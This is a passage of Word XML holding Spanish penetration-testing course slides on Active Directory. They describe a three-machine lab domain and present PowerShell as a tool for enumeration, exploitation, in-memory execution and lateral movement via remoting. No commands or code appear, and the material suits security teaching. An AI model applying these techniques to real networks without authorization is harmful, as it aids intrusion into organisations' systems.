                <v:shape id="Textbox 469" o:spid="_x0000_s1238" type="#_x0000_t202" style="position:absolute;width:121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5802339C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                        <w:pPr>
                          <w:spacing w:before="389"/>
                          <w:ind w:left="3987"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Calibri Light"/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Calibri Light"/>
                            <w:color w:val="FFFFFF"/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                          <w:t>4.2.2 Aspectos esenciales de Active Directory</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap anchorx="page" anchory="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7685CC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CF7910B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="308413BC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55F5EABD" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="45"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="563B2D86" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="894"/>
        </w:tabs>
        <w:ind w:left="894" w:hanging="450"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>En el entorno local tenemos 3 máquinas configuradas en un entorno de dominio.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374E57DB" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="895"/>
          <w:tab w:val="left" w:pos="1003"/>
        </w:tabs>
        <w:spacing w:before="576" w:line="235" w:lineRule="auto"/>
        <w:ind w:left="895" w:right="1138" w:hanging="452"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:tab/>
        <w:t>Se puede utilizar Windows PowerShell, ejecutable nativo de Windows para fines de enumeración y explotación.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538D2ECB" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="894"/>
        </w:tabs>
        <w:spacing w:before="571"/>
        <w:ind w:left="894" w:hanging="450"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Rango de direcciones IP dentro del ámbito:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A491176" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="102FD567" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="174"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableNormal"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1121" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="01E0" w:firstRow="1" w:lastRow="1" w:firstColumn="1" w:lastColumn="1" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="440"/>
        <w:gridCol w:w="2426"/>
        <w:gridCol w:w="3858"/>
      </w:tblGrid>
      <w:tr w:rsidR="001B199E" w:rsidRPr="007A7B84" w14:paraId="0647578E" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="528"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="161A9BB9" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="0" w:line="489" w:lineRule="exact"/>
              <w:ind w:left="0" w:right="98"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:spacing w:val="-10"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>−</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2426" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15D4D0BE" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="0" w:line="489" w:lineRule="exact"/>
              <w:ind w:left="4" w:right="65"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>10.10.10.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3858" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2058B5E8" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="0" w:line="489" w:lineRule="exact"/>
              <w:ind w:left="213" w:right="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Controlador de dominio</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B199E" w:rsidRPr="007A7B84" w14:paraId="35C977BD" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="576"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79F6A6FE" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="0" w:line="537" w:lineRule="exact"/>
              <w:ind w:left="0" w:right="98"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:spacing w:val="-10"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>−</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2426" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06715843" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="0" w:line="537" w:lineRule="exact"/>
              <w:ind w:left="0" w:right="65"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>10.10.10.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3858" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4553AABA" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="0" w:line="537" w:lineRule="exact"/>
              <w:ind w:left="212" w:right="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Servidor de aplicaciones</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B199E" w:rsidRPr="007A7B84" w14:paraId="4F501557" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="528"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D036328" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="0" w:line="508" w:lineRule="exact"/>
              <w:ind w:left="0" w:right="98"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:spacing w:val="-10"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>−</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2426" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55FFB2AC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="0" w:line="508" w:lineRule="exact"/>
              <w:ind w:left="0" w:right="65"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>10.10.10.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3858" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D7652B7" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="0" w:line="508" w:lineRule="exact"/>
              <w:ind w:left="212" w:right="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Sistema de empleados</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4E4F82CC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="TableParagraph"/>
        <w:spacing w:line="508" w:lineRule="exact"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="0" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B599DEE" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1417"/>
        </w:tabs>
        <w:spacing w:before="62"/>
        <w:ind w:left="1417" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b w:val="0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Windows PowerShell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180C9ACA" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="154"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="369AFD5E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2137"/>
        </w:tabs>
        <w:ind w:left="2137" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Es un intérprete de .NET que viene instalado por defecto en todas las versiones de Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F6CBA6" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="67"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00EF8A9B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2137"/>
        </w:tabs>
        <w:ind w:left="2137" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Se pueden ejecutar binarios y scripts completamente en memoria utilizando PowerShell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A513FC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="119"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57FC5C73" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2138"/>
        </w:tabs>
        <w:spacing w:line="211" w:lineRule="auto"/>
        <w:ind w:left="2138" w:right="2760"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="15819776" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4259C52D" wp14:editId="08EE2C30">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>9174480</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>630848</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2001012" cy="1638300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>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217" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2001012" cy="1638300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>A través de PowerShell se puede administrar una red y proporciona acceso para administrar el entorno de Active Directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07738C12" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="83"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76D14310" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2137"/>
        </w:tabs>
        <w:ind w:left="2137" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Útil para escenarios de movimiento lateral</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5506A350" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2857"/>
        </w:tabs>
        <w:spacing w:before="45"/>
        <w:ind w:left="2857" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Comunicación remota de PowerShell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB4207B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2857"/>
        </w:tabs>
        <w:spacing w:before="42"/>
        <w:ind w:left="2857" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Comunicación remota de PowerShell basada en web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4F0884"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399" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52069747" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1392"/>
        </w:tabs>
        <w:spacing w:before="56"/>
        <w:ind w:left="1392"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b w:val="0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Invocación de un módulo de PowerShell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E66B36" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="154"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FABF073" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2112"/>
        </w:tabs>
        <w:spacing w:line="552" w:lineRule="exact"/>
        <w:ind w:left="2112" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Los scripts con extensión "</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>*.ps1</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>", "</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>*.psm1</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
